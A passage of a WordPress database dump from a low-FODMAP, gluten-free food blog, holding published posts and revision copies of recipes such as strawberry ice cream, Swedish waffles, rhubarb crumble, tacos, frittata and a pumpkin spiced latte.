You can enjoy the ice-cream straight away if you want it to have this lovely soft ice consistency or you can freeze it for later. This recipe makes 4 portions and you need to stick to one portion at the time if you have a sensitive tummy.

\n\n\n\n

I found some really delicious gluten and lactose free ice-cream cones in Sweden when I was back at Easter and brought them with me back to Dubai. You can of course have this ice-cream on it\'s own if you can\'t find any gluten and lactose free ice-creams cones where you live.

\n\n\n\n
\"\"/
\n\n\n\n

 INGREDIENTS

\n\n\n\n
  • 300g frozen strawberries
  • 1/2 cup (1 dl) macadamia nuts
  • 1 ripe banana
  • 1-2 tbsp maple syrup (optional)
\n\n\n\n

INSTRUCTIONSAdd all the ingredients to a blender/food processor and blend until you get a soft ice-cream consistency. Add a little bit of hot water if you need to make the consistency a little bit softer. Eat immediately if you want a soft ice consistency ice-cream or freeze and scoop out on hot summer days.

\n\n\n\n
\"\"/
\n','Strawberry ice-cream - tummy friendly and low FODMAP','','publish','open','open','','strawberry-ice-cream-tummy-friendly-and-low-fodmap','','','2020-04-06 22:54:33','2020-04-06 22:54:33','',0,'http://tummyrevolution.com/?p=4715',0,'post','',0),(4716,1,'2020-04-05 00:16:47','2020-04-05 00:16:47','\n

\n\nWaffles were a regular lunch in our house growing up in Sweden. I know most people tend to have waffles for breakfast or as a desert but my mum always made them for lunch and still does. Served with homemade berry compost/jams and occasionally whipped cream, no one ever complains when waffles are on the menu.  

\n\n\n\n

When I initially went gluten free I made some waffles that got stuck in the waffle maker and didn\'t taste very nice. It put me of making them for some time and it wasn\'t until recently I\'ve found my way back to waffles again and I\'m so glad I did because made right, they just taste so good.

\n\n\n\n
\"\"/
\n\n\n\n

There are of course different recipes depending on where you live or come from. American waffles tend to be sweeter and if you use an American waffle maker the shape and size of the waffles are different to the Swedish once.

\n\n\n\n

Swedish waffles are not sweet as you tend to add the sweetness as a topping instead. The Swedish waffle makers are also shallower then the traditional American once, making the waffles a bit thinner..... but delicious :)

\n\n\n\n

You can get a Swedish type waffle maker on Amazon in both the UK and US (see picture below). They cost around £15.00 and are well worth it if you ask me.

\n\n\n\n
\"\"/
\n\n\n\n

 I\'ve decide to post two different recipes as it will give you more options depending on what flour you want to use or have at home. There are other great and perhaps healthier options available but I decided to stick to two recipes that are as close to the original as possible

\n\n\n\n

Both recipes work well but the second one with corn flour is probably my favourite.

\n\n\n\n

I tend to serve waffles with fruit, berries or a jam/compote of some kind. I also love it with some lactose free whipped cream but you can also use shipped coconut cream if you prefer a dairy free alternative.

\n\n\n\n

RECIPE NUMBER 1

INGRIDIENTS

\n\n\n\n

Serve 4 people

\n\n\n\n
  • 100g melted butter
  • 5 dl Lactose free milk or almond milk
  • 1 tsp baking powder
  • 4.5 dl gluten free flour mix
  • 1/2 tsp salt
  • 1 tsp sugar
\n\n\n\n

INSTRUTIONS
1. Melt the butter, then add the milk and let it cool a bit.

\n\n\n\n

2. Mix the baking powder and the flower mix, then add to the liquids.

\n\n\n\n

3. Add salt and sugar then whisk until you have a smooth consistency.

\n\n\n\n

4. Grease the waffle with some butter and add approximately one ladle of mixture. Bake until golden.

\n\n\n\n

RECIPE NUMBER 2

\n\n\n\n

INGRIDIENTS

\n\n\n\n
  • 1.2 cup / 300 ml / 3 dl cornflour
  • 2 tsp baking powder
  • 1/2 tsp salt
  • 1.2 cup / 300ml / 3 dl lactose free milk or almond milk
  • 2 Eggs
  • 2 tbsp oil or melted butter
\n\n\n\n

INSTRUTIONS
1. Mix all the dry ingredients.

\n\n\n\n

2. Add approximately half the milk and whisk until the mix is smooth. Add the rest of the milk, eggs and oil and whisk until well mixed.

\n\n\n\n

3. Heat up the waffle maker and grease with some butter once hot.

\n\n\n\n

4. Pour in approximately 1/4 cup or 1/2 dl of mixture and bake until golden.

5. Whisk the mixture in between each waffle to avoid the mixture sinking to the bottom.

\n\n\n\n

Serve with your favourite tummy friendly topping such as strawberries, blueberries, raspberries, jam/compote, lemon juice, maple syrup.

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n','Gluten free waffles','','publish','open','open','','gluten-free-waffles','','','2020-04-06 23:06:14','2020-04-06 23:06:14','',0,'http://tummyrevolution.com/?p=4716',0,'post','',0),(4717,1,'2020-04-05 00:16:29','2020-04-05 00:16:29','\n

I\'ve had a bit of an ice cream obsession lately. It\'s just been so much fun experimenting with flavours and ingredients so I just kept going. Tasting ice cream is not so bad either and especially when it\'s summer and the weather is great.
My children are great at tasting my cooking and their opinion is generally very honest, a bit too honest sometimes perhaps. I know children\'s taste buds are not quite the same as adults but I think their taste speaks for many in general, especially when it comes to ice creams. This strawberry ice-cream is a favourite of theirs and with their stamp of approval, I feel it\'s good enough to share with you.

\n\n\n\n
\"\"/
\n\n\n\n


I\'ve made ice-cream using bananas before and I guess I thought they were ok but not great. I really wanted it to taste great because it\'s so healthy, but something was missing and I just could\'t put my finger on it.....until recently. It wasn\'t until I added macadamia nuts that it finally all came together and I managed to get that lovely creamy consistency and flavour that I believe an ice-cream should have. 

I personally don\'t like using over ripe bananas as I think the ice cream just taste of... overripe bananas then. The bananas needs to be ripe but note overripe to get the right flavour. Also, you\'ll want to use \'fresh\' macadamia nuts when you make ice cream. If you have macadamia nuts (like I once had) that have been in your cupboard for some time, they have a tendency of taking on this strange flavour that will be transferred to your ice-cream. It totally ruined one batch for me :( So keep to fresh nuts :)

\n\n\n\n

You can enjoy the ice-cream straight away if you want it to have this lovely soft ice consistency or you can freeze it for later. This recipe makes 4 portions and you need to stick to one portion at the time if you have a sensitive tummy.

\n\n\n\n

I found some really delicious gluten and lactose free ice-cream cones in Sweden when I was back at Easter and brought them with me back to Dubai. You can of course have this ice-cream on it\'s own if you can\'t find any gluten and lactose free ice-creams cones where you live.

\n\n\n\n
\"\"/
\n\n\n\n

 INGREDIENTS

\n\n\n\n
  • 300g frozen strawberries
  • 1/2 cup (1 dl) macadamia nuts
  • 1 ripe banana
  • 1-2 tbsp maple syrup (optional)
\n\n\n\n

INSTRUCTIONSAdd all the ingredients to a blender/food processor and blend until you get a soft ice-cream consistency. Add a little bit of hot water if you need to make the consistency a little bit softer. Eat immediately if you want a soft ice consistency ice-cream or freeze and scoop out on hot summer days.

\n\n\n\n
\"\"/
\n','Strawberry ice-cream - tummy friendly and low FODMAP','','inherit','closed','closed','','4715-revision-v1','','','2020-04-05 00:16:29','2020-04-05 00:16:29','',4715,'http://tummyrevolution.com/4715-revision-v1/',0,'revision','',0),(4718,1,'2020-04-05 00:16:47','2020-04-05 00:16:47','\n

\n\nWaffles were a regular lunch in our house growing up in Sweden. I know most people tend to have waffles for breakfast or as a desert but my mum always made them for lunch and still does. Served with homemade berry compost/jams and occasionally whipped cream, no one ever complains when waffles are on the menu.  

\n\n\n\n

When I initially went gluten free I made some waffles that got stuck in the waffle maker and didn\'t taste very nice. It put me of making them for some time and it wasn\'t until recently I\'ve found my way back to waffles again and I\'m so glad I did because made right, they just taste so good.

\n\n\n\n
\"\"/
\n\n\n\n

There are of course different recipes depending on where you live or come from. American waffles tend to be sweeter and if you use an American waffle maker the shape and size of the waffles are different to the Swedish once.

\n\n\n\n

Swedish waffles are not sweet as you tend to add the sweetness as a topping instead. The Swedish waffle makers are also shallower then the traditional American once, making the waffles a bit thinner..... but delicious :)

\n\n\n\n

You can get a Swedish type waffle maker on Amazon in both the UK and US (see picture below). They cost around £15.00 and are well worth it if you ask me.

\n\n\n\n
\"\"/
\n\n\n\n

 I\'ve decide to post two different recipes as it will give you more options depending on what flour you want to use or have at home. There are other great and perhaps healthier options available but I decided to stick to two recipes that are as close to the original as possible

\n\n\n\n

Both recipes work well but the second one with corn flour is probably my favourite.

\n\n\n\n

I tend to serve waffles with fruit, berries or a jam/compote of some kind. I also love it with some lactose free whipped cream but you can also use shipped coconut cream if you prefer a dairy free alternative.

\n\n\n\n

RECIPE NUMBER 1

INGRIDIENTS

\n\n\n\n

Serve 4 people

\n\n\n\n
  • 100g melted butter
  • 5 dl Lactose free milk or almond milk
  • 1 tsp baking powder
  • 4.5 dl gluten free flour mix
  • 1/2 tsp salt
  • 1 tsp sugar
\n\n\n\n

INSTRUTIONS
1. Melt the butter, then add the milk and let it cool a bit.

\n\n\n\n

2. Mix the baking powder and the flower mix, then add to the liquids.

\n\n\n\n

3. Add salt and sugar then whisk until you have a smooth consistency.

\n\n\n\n

4. Grease the waffle with some butter and add approximately one ladle of mixture. Bake until golden.

\n\n\n\n

RECIPE NUMBER 2

\n\n\n\n

INGRIDIENTS

\n\n\n\n
  • 1.2 cup / 300 ml / 3 dl cornflour
  • 2 tsp baking powder
  • 1/2 tsp salt
  • 1.2 cup / 300ml / 3 dl lactose free milk or almond milk
  • 2 Eggs
  • 2 tbsp oil or melted butter
\n\n\n\n

INSTRUTIONS
1. Mix all the dry ingredients.

\n\n\n\n

2. Add approximately half the milk and whisk until the mix is smooth. Add the rest of the milk, eggs and oil and whisk until well mixed.

\n\n\n\n

3. Heat up the waffle maker and grease with some butter once hot.

\n\n\n\n

4. Pour in approximately 1/4 cup or 1/2 dl of mixture and bake until golden.

5. Whisk the mixture in between each waffle to avoid the mixture sinking to the bottom.

\n\n\n\n

Serve with your favourite tummy friendly topping such as strawberries, blueberries, raspberries, jam/compote, lemon juice, maple syrup.

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n','Gluten free waffles','','inherit','closed','closed','','4716-revision-v1','','','2020-04-05 00:16:47','2020-04-05 00:16:47','',4716,'http://tummyrevolution.com/4716-revision-v1/',0,'revision','',0),(4719,1,'2020-04-05 00:17:11','2020-04-05 00:17:11','\n

Rhubarb crumble is pretty high up there on my list of favourite deserts. In fact, it\'s probably my number one desert if served with vanilla ice cream. Being FODMAP sensitive including wheat sensitive has it\'s struggles. Because let\'s face it, sometimes wheat/gluten free deserts don\'t taste that great and I find it a bit hard when friends and family bite into their delicious cakes and deserts and I can\'t have any. That\'s why I\'m so pleased that it\'s still possible to make a really nice tasting dessert like this crumble which still taste absolutely delicious. In fact, It doesn\'t even taste gluten free at all and my in-laws don\'t even know it\'s gluten free and they love it too.

\n\n\n\n

You can choose to use other fruit or berries such as raspberries, strawberries, blueberries or a mix, but my favourite is rhubarb. At the time of making this crumble I was back in Wales and found some Rhubarb in the grand which I used but you can usually find it in the supermarket or green grocer.

\n\n\n\n
\"\"/
\n\n\n\n

When we lived in Wales full-time I had a few vegetable boxes but unfortunately nothing is growing in them at the moment as Im not there to tend to them. Luckily the Rhubarb was sill ok, if only a bit overgrown so I managed to save what I think was the last lot of the summer.

\n\n\n\n
\"\"/
\n\n\n\n

Rhubarb has that tart flavour I really like and together with a sweet crumble it taste so good.

\n\n\n\n

It only take a few minutes to make the crumble which is another reason why I like it so much. I\'m really not one for complicated things.

\n\n\n\n

Ingredients

\n\n\n\n

800g rhubarb (or you can mix rhubarb with strawberries or raspberries)
2 tsp sugar
1 pinch flaky sea salt
some butter to grease the pie dish

\n\n\n\n

Crumble

\n\n\n\n

125g cold butter
1 cup (200ml)  gluten free flour mix
0.5 cup (100ml) oats (gluten free in you\'re coeliac)
0.8 cup (150ml) sugar
1 tsp flaky sea salt 

\n\n\n\n

To serve
Whipped cream, lactose free 
ice-cream, or whipped coconut cream

Instructions

\n\n\n\n

Serve 6 people

1. Preheat the oven to 225 •C

2. Crumble: cut the butter into smaller bits. 
With your finger tips mix together the butter, gluten free flour and oats. Mix in the sugar and finger salt.

3. Rinse the rhubarb and cut away any bad/brown bits. Cut into smaller cube size pieces then mix with the sugar, cinnamon and finger salt in a buttered pie dish, 28cm diameter.

4. Distribute the crumble mix evenly over the rhubarb and bake in the oven for 20-25 minutes until slightly golden brown.

5. For serving: Let it cool for a few minutes and serve with lactose free ice cream or lactose free whipped cream.

\n\n\n\n
\"\"/
\n','GLUTEN FREE RHUBARB CRUMBLE','','publish','open','open','','gluten-free-rhubarb-crumble','','','2020-04-06 23:06:00','2020-04-06 23:06:00','',0,'http://tummyrevolution.com/?p=4719',0,'post','',0),(4721,1,'2020-04-05 00:17:11','2020-04-05 00:17:11','\n

Rhubarb crumble is pretty high up there on my list of favourite deserts. In fact, it\'s probably my number one desert if served with vanilla ice cream. Being FODMAP sensitive including wheat sensitive has it\'s struggles. Because let\'s face it, sometimes wheat/gluten free deserts don\'t taste that great and I find it a bit hard when friends and family bite into their delicious cakes and deserts and I can\'t have any. That\'s why I\'m so pleased that it\'s still possible to make a really nice tasting dessert like this crumble which still taste absolutely delicious. In fact, It doesn\'t even taste gluten free at all and my in-laws don\'t even know it\'s gluten free and they love it too.

\n\n\n\n

You can choose to use other fruit or berries such as raspberries, strawberries, blueberries or a mix, but my favourite is rhubarb. At the time of making this crumble I was back in Wales and found some Rhubarb in the grand which I used but you can usually find it in the supermarket or green grocer.

\n\n\n\n
\"\"/
\n\n\n\n

When we lived in Wales full-time I had a few vegetable boxes but unfortunately nothing is growing in them at the moment as Im not there to tend to them. Luckily the Rhubarb was sill ok, if only a bit overgrown so I managed to save what I think was the last lot of the summer.

\n\n\n\n
\"\"/
\n\n\n\n

Rhubarb has that tart flavour I really like and together with a sweet crumble it taste so good.

\n\n\n\n

It only take a few minutes to make the crumble which is another reason why I like it so much. I\'m really not one for complicated things.

\n\n\n\n

Ingredients

\n\n\n\n

800g rhubarb (or you can mix rhubarb with strawberries or raspberries)
2 tsp sugar
1 pinch flaky sea salt
some butter to grease the pie dish

\n\n\n\n

Crumble

\n\n\n\n

125g cold butter
1 cup (200ml)  gluten free flour mix
0.5 cup (100ml) oats (gluten free in you\'re coeliac)
0.8 cup (150ml) sugar
1 tsp flaky sea salt 

\n\n\n\n

To serve
Whipped cream, lactose free 
ice-cream, or whipped coconut cream

Instructions

\n\n\n\n

Serve 6 people

1. Preheat the oven to 225 •C

2. Crumble: cut the butter into smaller bits. 
With your finger tips mix together the butter, gluten free flour and oats. Mix in the sugar and finger salt.

3. Rinse the rhubarb and cut away any bad/brown bits. Cut into smaller cube size pieces then mix with the sugar, cinnamon and finger salt in a buttered pie dish, 28cm diameter.

4. Distribute the crumble mix evenly over the rhubarb and bake in the oven for 20-25 minutes until slightly golden brown.

5. For serving: Let it cool for a few minutes and serve with lactose free ice cream or lactose free whipped cream.

\n\n\n\n
\"\"/
\n','GLUTEN FREE RHUBARB CRUMBLE','','inherit','closed','closed','','4719-revision-v1','','','2020-04-05 00:17:11','2020-04-05 00:17:11','',4719,'http://tummyrevolution.com/4719-revision-v1/',0,'revision','',0),(4723,1,'2020-04-05 00:17:56','2020-04-05 00:17:56','\n

There has been a significant increase in the number of people excluding gluten from their diet in recent years. You have probably noticed how supermarket stock more and more gluten free products, accommodating for not only people with celiac but also a rapidly growing number of people with non-celiac gluten-sensitivity (NCGS). People with NCGS suffer with symptoms such as gas, cramps, bloating, or diarrhea if the consume gluten and going gluten free simply means they feel much better.

But according to a recent article in Men\'s Journal, doctors are now seriously doubting whether NCGS is really all that common. A landmark from last year turned out some very convincing evidence that gluten may not be the culprit making so many people sick. Instead, it is likely a large class of carbohydrates called FODMAPs. This is something we here at Tummy Revolution have suspected for some time as it makes sense once you take a closer look at FODMAPs.

The thought that FODMAPs has a greater effect on many people\'s health then simply gluten alone is not new, but it seems to be gaining more momentum now which is good news. Many people are unfamiliar with FODMAPs and how they can affect some people so more studies and news like this is great . 

\n\n\n\n

You can read more about the research in an article by Mens Journal article here

\n','Gluten free diet or low FODMAP diet?','','publish','open','open','','gluten-free-diet-or-low-fodmap-diet','','','2020-04-13 01:41:40','2020-04-13 01:41:40','',0,'http://tummyrevolution.com/?p=4723',0,'post','',0),(4724,1,'2020-04-05 00:19:21','2020-04-05 00:19:21','\n

Our favourite spice at the moment is turmeric due to its anti inflammatory properties - its ideal to tame a troubled tummy.  However, it\'s not just turmeric with this fantastic property.  Check out this informative website for more fantastic facts on spices:

\n\n\n\n
\nhttps://www.organicfacts.net/health-benefits/herbs-and-spices/spices.html\n
\n','SPICE AND ALL THINGS NICE','','publish','open','open','','spice-and-all-things-nice','','','2020-04-13 01:43:17','2020-04-13 01:43:17','',0,'http://tummyrevolution.com/?p=4724',0,'post','',0),(4725,1,'2020-04-05 00:17:56','2020-04-05 00:17:56','\n

There has been a significant increase in the number of people excluding gluten from their diet in recent years. You have probably noticed how supermarket stock more and more gluten free products, accommodating for not only people with celiac but also a rapidly growing number of people with non-celiac gluten-sensitivity (NCGS). People with NCGS suffer with symptoms such as gas, cramps, bloating, or diarrhea if the consume gluten and going gluten free simply means they feel much better.

But according to a recent article in Men\'s Journal, doctors are now seriously doubting whether NCGS is really all that common. A landmark from last year turned out some very convincing evidence that gluten may not be the culprit making so many people sick. Instead, it is likely a large class of carbohydrates called FODMAPs. This is something we here at Tummy Revolution have suspected for some time as it makes sense once you take a closer look at FODMAPs.

The thought that FODMAPs has a greater effect on many people\'s health then simply gluten alone is not new, but it seems to be gaining more momentum now which is good news. Many people are unfamiliar with FODMAPs and how they can affect some people so more studies and news like this is great . 

\n\n\n\n

You can read more about the research in an article by Mens Journal article here

\n','Gluten free diet or low FODMAP diet?','','inherit','closed','closed','','4723-revision-v1','','','2020-04-05 00:17:56','2020-04-05 00:17:56','',4723,'http://tummyrevolution.com/4723-revision-v1/',0,'revision','',0),(4726,1,'2020-04-05 00:19:49','2020-04-05 00:19:49','\n

The recipe for our tasty taco mince is very similar to our Bolognese (in the recipe section).  The only difference is that we add a few spices.  Our trick, is to double the amount of Bolognese we make, then use half of it for tacos later in the week.  A great time saver! You can even freeze the mince for up to 2 weeks if you don\'t need it all straight away. 

\n\n\n\n

Ingredients (serves 4)

\n\n\n\n

8 - 12 taco shells

\n\n\n\n

1 tbsp garlic infused olive oil

\n\n\n\n

400g chopped tomatoes

\n\n\n\n

1 red pepper (diced)

\n\n\n\n

3 - 4 spring onions, green part only (chopped) 

\n\n\n\n

400g beef mince (ideally lean, grass fed)

\n\n\n\n

2 tbsp tomato purée 

\n\n\n\n

1/2 tsp paprika

\n\n\n\n

1/2 tsp cayenne pepper

\n\n\n\n

A pinch of salt and pepper 

\n\n\n\n

100g cheddar cheese

\n\n\n\n

1 lime

\n\n\n\n

1 - 2 chilies 

\n\n\n\n

Sour cream or lactose free alternative (optional)

\n\n\n\n

Method

\n\n\n\n

1. Heat 1 tbsp garlic infused oil in a pan, on a medium heat.

\n\n\n\n

2. Add the spring onions and cook for 2/3 minutes, until softened.

\n\n\n\n

3. Add the mince and cook until browned, stirring regularly so it separates and does not stick together.

\n\n\n\n

4. Put in the diced peppers and cook for a further 4/5 minutes.

\n\n\n\n

5. Pour in the chopped tomatoes and add the purée, spices and a pinch of salt and pepper.

\n\n\n\n

6. Stir all the ingredients together and bring to the boil.

\n\n\n\n

7. Reduce to a low heat, cover and allow to cook for 30/40 minutes, stirring occasionally to ensure it does not stick to the bottom of the pan.

\n\n\n\n

8.  When the mince is ready, place the taco shells in a preheated oven for a few minutes (instructions vary, so please refer to packet)

\n\n\n\n

9.  Place your mince inside your tacos and add your choice of toppings - grated cheese, squeeze of lime juice, chopped chili, sour cream...

\n\n\n\n

Great accompanied by a side salad of leafy greens!

\n','Tasty Tacos','','publish','open','open','','tasty-tacos','','','2020-04-06 23:04:46','2020-04-06 23:04:46','',0,'http://tummyrevolution.com/?p=4726',0,'post','',0),(4727,1,'2020-04-05 00:19:21','2020-04-05 00:19:21','\n

Our favourite spice at the moment is turmeric due to its anti inflammatory properties - its ideal to tame a troubled tummy.  However, it\'s not just turmeric with this fantastic property.  Check out this informative website for more fantastic facts on spices:

\n\n\n\n
\nhttps://www.organicfacts.net/health-benefits/herbs-and-spices/spices.html\n
\n','SPICE AND ALL THINGS NICE','','inherit','closed','closed','','4724-revision-v1','','','2020-04-05 00:19:21','2020-04-05 00:19:21','',4724,'http://tummyrevolution.com/4724-revision-v1/',0,'revision','',0),(4728,1,'2020-04-05 00:19:49','2020-04-05 00:19:49','\n

The recipe for our tasty taco mince is very similar to our Bolognese (in the recipe section).  The only difference is that we add a few spices.  Our trick, is to double the amount of Bolognese we make, then use half of it for tacos later in the week.  A great time saver! You can even freeze the mince for up to 2 weeks if you don\'t need it all straight away. 

\n\n\n\n

Ingredients (serves 4)

\n\n\n\n

8 - 12 taco shells

\n\n\n\n

1 tbsp garlic infused olive oil

\n\n\n\n

400g chopped tomatoes

\n\n\n\n

1 red pepper (diced)

\n\n\n\n

3 - 4 spring onions, green part only (chopped) 

\n\n\n\n

400g beef mince (ideally lean, grass fed)

\n\n\n\n

2 tbsp tomato purée 

\n\n\n\n

1/2 tsp paprika

\n\n\n\n

1/2 tsp cayenne pepper

\n\n\n\n

A pinch of salt and pepper 

\n\n\n\n

100g cheddar cheese

\n\n\n\n

1 lime

\n\n\n\n

1 - 2 chilies 

\n\n\n\n

Sour cream or lactose free alternative (optional)

\n\n\n\n

Method

\n\n\n\n

1. Heat 1 tbsp garlic infused oil in a pan, on a medium heat.

\n\n\n\n

2. Add the spring onions and cook for 2/3 minutes, until softened.

\n\n\n\n

3. Add the mince and cook until browned, stirring regularly so it separates and does not stick together.

\n\n\n\n

4. Put in the diced peppers and cook for a further 4/5 minutes.

\n\n\n\n

5. Pour in the chopped tomatoes and add the purée, spices and a pinch of salt and pepper.

\n\n\n\n

6. Stir all the ingredients together and bring to the boil.

\n\n\n\n

7. Reduce to a low heat, cover and allow to cook for 30/40 minutes, stirring occasionally to ensure it does not stick to the bottom of the pan.

\n\n\n\n

8.  When the mince is ready, place the taco shells in a preheated oven for a few minutes (instructions vary, so please refer to packet)

\n\n\n\n

9.  Place your mince inside your tacos and add your choice of toppings - grated cheese, squeeze of lime juice, chopped chili, sour cream...

\n\n\n\n

Great accompanied by a side salad of leafy greens!

\n','Tasty Tacos','','inherit','closed','closed','','4726-revision-v1','','','2020-04-05 00:19:49','2020-04-05 00:19:49','',4726,'http://tummyrevolution.com/4726-revision-v1/',0,'revision','',0),(4729,1,'2020-04-05 00:20:15','2020-04-05 00:20:15','\n

This Frittata makes a brilliant breakfast, lunch or dinner.  You can simply have it on its own (hot or cold) but we love it with sautéed potatoes and a side salad, for a more substantial dish. 

\n\n\n\n

The beauty of it is that if you don’t like our choice of vegetables, you can mix it up and add some of your own – just make sure they are FODMAP friendly! Why not try pepper or even add some cheese…?

\n\n\n\n

Ingredients

\n\n\n\n

1 tbsp garlic infused oil

\n\n\n\n

100g tenderstem broccoli

\n\n\n\n

200g fresh porcini mushrooms

\n\n\n\n

200g cherry vine tomatoes

\n\n\n\n

8 eggs

\n\n\n\n

Salt and pepper

\n\n\n\n

Method

\n\n\n\n
  1. Preheat the oven to 180°C.
  2. Heat the garlic infused oil in a frying pan. Add the broccoli and cook for about 5 minutes, until it starts to crisp.  Then, place the broccoli evenly into a baking dish.
  3. Then, cook the mushrooms in the same pan for about 5 minutes, tossing occasionally, before adding them too, to the dish.
  4. Finally, place the tomatoes in the pan (add a little more oil at this point if necessary). Cook for a further 5 minutes, until they start to soften and brown.  Place the tomatoes in the dish, ideally still on their vine.
  5. Beat the eggs and season with salt and pepper. Then, pour them evenly over the vegetables.
  6. Bake in the oven for about 20 minutes, or until the Frittata has turned golden and the egg mixture is cooked through.
\n\n\n\n

Breakfast option – alone or with a side of baked beans

\n\n\n\n

Lunch option – with a side salad, a few slices of cheese and some chutney

\n\n\n\n

Dinner option – with a salad and potato side

\n\n\n\n
\"\"/
\n','Frittata','','publish','open','open','','frittata','','','2020-04-06 23:04:36','2020-04-06 23:04:36','',0,'http://tummyrevolution.com/?p=4729',0,'post','',0),(4730,1,'2020-04-05 00:20:15','2020-04-05 00:20:15','\n

This Frittata makes a brilliant breakfast, lunch or dinner.  You can simply have it on its own (hot or cold) but we love it with sautéed potatoes and a side salad, for a more substantial dish. 

\n\n\n\n

The beauty of it is that if you don’t like our choice of vegetables, you can mix it up and add some of your own – just make sure they are FODMAP friendly! Why not try pepper or even add some cheese…?

\n\n\n\n

Ingredients

\n\n\n\n

1 tbsp garlic infused oil

\n\n\n\n

100g tenderstem broccoli

\n\n\n\n

200g fresh porcini mushrooms

\n\n\n\n

200g cherry vine tomatoes

\n\n\n\n

8 eggs

\n\n\n\n

Salt and pepper

\n\n\n\n

Method

\n\n\n\n
  1. Preheat the oven to 180°C.
  2. Heat the garlic infused oil in a frying pan. Add the broccoli and cook for about 5 minutes, until it starts to crisp.  Then, place the broccoli evenly into a baking dish.
  3. Then, cook the mushrooms in the same pan for about 5 minutes, tossing occasionally, before adding them too, to the dish.
  4. Finally, place the tomatoes in the pan (add a little more oil at this point if necessary). Cook for a further 5 minutes, until they start to soften and brown.  Place the tomatoes in the dish, ideally still on their vine.
  5. Beat the eggs and season with salt and pepper. Then, pour them evenly over the vegetables.
  6. Bake in the oven for about 20 minutes, or until the Frittata has turned golden and the egg mixture is cooked through.
\n\n\n\n

Breakfast option – alone or with a side of baked beans

\n\n\n\n

Lunch option – with a side salad, a few slices of cheese and some chutney

\n\n\n\n

Dinner option – with a salad and potato side

\n\n\n\n
\"\"/
\n','Frittata','','inherit','closed','closed','','4729-revision-v1','','','2020-04-05 00:20:15','2020-04-05 00:20:15','',4729,'http://tummyrevolution.com/4729-revision-v1/',0,'revision','',0),(4731,1,'2020-04-05 00:20:40','2020-04-05 00:20:40','\n

The Nation\'s favourite! No one can resist a Pumpkin Spiced Latte at the moment - Starbucks is overwhelmed with orders. However, we think that ours is better! And we are willing to share our secret recipe with you...

\n\n\n\n

Ingredients

\n\n\n\n

200ml lactose free milk or almond milk
1 tbsp pumpkin puree
1 tbsp maple syrup
½ tsp vanilla extract
½ tsp pumpkin spice or make your own (2 tbsp cinnamon, 1 tsp ginger, ½ allspice, ½ tsp nutmeg - simply mix together)
½ cup strong brew coffee
Whipped cream (optional)
Ground cinnamon, to sprinkle on top

\n\n\n\n

Method

\n\n\n\n

1. Add the milk, puree and syrup to a saucepan and cook on a medium heat. Heat until the ingredients are well mixed.

2. Remove from the heat and add the vanilla and spice.

3. Half fill a mug with brewed coffee and then add the milk mixture to fill the mug.

4. Top with whipped cream and a sprinkle of cinnamon.

\n','Pumpkin Spiced Latte','','publish','open','open','','pumpkin-spiced-latte','','','2020-04-06 23:03:37','2020-04-06 23:03:37','',0,'http://tummyrevolution.com/?p=4731',0,'post','',0),(4732,1,'2020-04-05 00:20:40','2020-04-05 00:20:40','\n

The Nation\'s favourite! No one can resist a Pumpkin Spiced Latte at the moment - Starbucks is overwhelmed with orders. However, we think that ours is better! And we are willing to share our secret recipe with you...

\n\n\n\n

Ingredients

\n\n\n\n

200ml lactose free milk or almond milk
1 tbsp pumpkin puree
1 tbsp maple syrup
½ tsp vanilla extract
½ tsp pumpkin spice or make your own (2 tbsp cinnamon, 1 tsp ginger, ½ allspice, ½ tsp nutmeg - simply mix together)
½ cup strong brew coffee
Whipped cream (optional)
Ground cinnamon, to sprinkle on top

\n\n\n\n

Method

\n\n\n\n

1. Add the milk, puree and syrup to a saucepan and cook on a medium heat. Heat until the ingredients are well mixed.

2. Remove from the heat and add the vanilla and spice.

3. Half fill a mug with brewed coffee and then add the milk mixture to fill the mug.

4. Top with whipped cream and a sprinkle of cinnamon.

\n','Pumpkin Spiced Latte','','inherit','closed','closed','','4731-revision-v1','','','2020-04-05 00:20:40','2020-04-05 00:20:40','',4731,'http://tummyrevolution.com/4731-revision-v1/',0,'revision','',0),(4733,1,'2020-04-05 00:21:24','2020-04-05 00:21:24','\n

We\'ve always found potatoes to be very soothing for our tummies. Baked potatoes are so easy to make for either lunch or dinner and you can vary the toppings to suit your taste. Sweet potatoes are unfortunately of the menu as they are high in FODMAP\'s, but ordinary once are ok.

\n\n\n\n

Potatoes seem to have bit of a bad reputation at the moment because it\'s fairly high in carbohydrates, but you might be surprised to know how nutritious it really is.
A large potato contains about 60 percent of the daily value for vitamin D and 45 percent of the daily value for vitamin C. It also contains 35 percent of the daily value for B-6, and 15% for thiamin, niacin, magnesium and iron.

\n\n\n\n

With some healthy toppings a baked potato can actually be a really healthy, nutritious meal that your tummy will love. 

\n\n\n\n

 We hope you enjoy it!

\n\n\n\n

Loaded baked potato

\n\n\n\n

Serves 1-2 

Ingredients
1-2 large baked potatoes
sea salt and pepper for seasoning 

suggested toppings 
3-4 grapes 
3-4 pineapple chunks 
1 grated carrot 
1 spring onion (green part only) chopped up 
3-4 olives 
2-3 cherry tomatoes 
a small bit of a cucumber cut in cunks 
1 tbsp mixed seeds (pumkin, sunflower and sesame seeds) 
a small bit of a pepper 
1-2 tbsp grated cheese 
1-2 slices parma ham 

METHOD
1. preheat the oven to 200ºC/390ºF 
2. If needed wash and dry the potatoes 
3. prick the potatos all over and rub with olive oil. Sprinkle over some seasalt and pepper 4. Place the potatoes directly onto the oven rack (no foil needed) and roast in the middle of the oven for 1h -1h 20mins. If you’re short of time you can microwave the potatoes for 5 minutes to soften and then finish them of in the oven for 35-40 mins, 
5. Serve with a selection of listed toppings of your choice

\n\n\n\n
\"\"/
\n','Loaded baked potato','','publish','open','open','','loaded-baked-potato','','','2020-04-06 23:02:45','2020-04-06 23:02:45','',0,'http://tummyrevolution.com/?p=4733',0,'post','',0),(4734,1,'2020-04-05 00:21:08','2020-04-05 00:21:08','\n

Did you know that kale is among the most nutrient dense foods on the planet?? Of course you did!! Kale is still all the rage these days. Our favourite way of using this \'super food\' is to make \'Kale Crisps\', with a sprinkle of sunflower seeds.  Both taste so delicious and different toasted.  For the seeds, it adds a lovely nutty flavour to the seeds.  It\'s a perfect little snack that your tummy will love; or it can be used as a side to a more substantial meal. 

\n\n\n\n

All you need for a light snack for 2 is...

\n\n\n\n

Ingredients

\n\n\n\n

125g kale

\n\n\n\n

2 tbsp olive oil

\n\n\n\n

1/2 tsp sea salt

\n\n\n\n

2 tbsp sunflower seeds

\n\n\n\n

Method

\n\n\n\n

1. Preheat the oven to 150C/300F.

\n\n\n\n

2. Pour the oil into a large bowl.

